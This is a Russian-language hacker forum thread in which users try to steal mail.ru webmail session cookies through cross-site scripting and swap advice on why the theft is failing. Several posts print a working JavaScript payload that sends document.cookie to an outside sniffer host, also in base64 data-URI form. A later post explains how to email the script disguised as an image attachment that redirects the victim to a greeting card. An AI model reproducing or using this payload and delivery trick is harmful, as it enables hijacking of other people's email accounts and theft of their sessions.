![]() |
куки
09.03.2010 16:00:49 []
IP: 92.126.**.*** Real IP*: 92.126.**.***, 193.169.***.*** QUERY: cck_count=0; cck_lasttime=1**8***641*** REFERER: empty AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20***115 Firefox/3.6 (.NET CLR 3.5.3***9) и где тут куки??? |
Нету
в куках по крайней мере мыло должно быть видно |
QUERY, собственно.
|
вот именно, я подкидываю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie; </script> И ГДЕ МОИ КУКИ???? |
Цитата:
повидимому вот это Код:
cck_count=0; cck_lasttime=1**8***641*** |
куки же длинные? по крайней мере те которые я видел
|
Цитата:
|
Цитата:
|
самое главное тебе надо найти xss
|
я мейловские куки глянул, они большие, да и видео когда смотрел там большие
|
Цитата:
|
точнее так можно)
|
Ты видимо не правильный запрос вписал
|
а как по правильно? открой тайну)
|
в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
|
Цитата:
|
Цитата:
этот файл нужно не подкинуть, а сделать так, чтоб код PHP код:
механизм внедрения такого кода называется "XSS" Вот когда это условие будет выполнено - приступай к следующему этапу |
то есть сначало нужно найти xss, а потом отправлять) спс)
|
и все-таки не догоняю...
|
вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script> img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie; </script> не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться |
вот где брал http://forum.xakep.ru/m_1224792/mpage_28/key_/tm.htm
|
куки будут вороваться только тогда, когда человек который смотрит страницу залогинен.
|
так оно и есть
|
я прочитаю, и на своем мыле проверяю. чтобы все понять
|
и никто не знает...
|
Если бы ты нормально излагал свои мысли, тебе бы помогли. Опиши свои действия по порядку с самого начала, если не хочешь светить ссылку на ресурс.
|
Цитата:
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie; </script> отправляю, захожу за другое мыло, там открываю этот файл, потом обновляю лог сниффа. и мне пришло то что написано в первом посте. |
да че такое теперь Query: empty. Ппц ну что такое кто-нибудь знает?
|
да, и картинка не высвечивается((
|
Скорее всего это вообще не уязвимость. И ты открыл этот файл вне контекста mail.ru. Об этом говорит и реферер пустой. Остынь. Попробуй рассмотреть сайты попроще.
|
Это первое :
<script> img = new Image(); img.src = "http://тут_ставишь_свое.gif?"+document.cook ie; // здесь ваш код для кражи кукис // редирект через 3 сек. var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете заменить на свой var speed = 3000; // редирект через 3 секунды function reload() { document.location = URL } setTimeout("reload()", speed); </script> Второе : создаешь текстовый документ, в нем сохраняешь этот скрипт третье : расширение текстового док-та ставишь .img Все прикрепляешь к письму и отправляешь. В мозилле точно не пашет, в опере хз, раньше работала.... сейчас не знаю. Вообще лучше XSS найди и тогда все будет проще. А вообще это все давно в инете валяется. |
се равно куки не приходят, ток ip
|
| Время: 11:07 |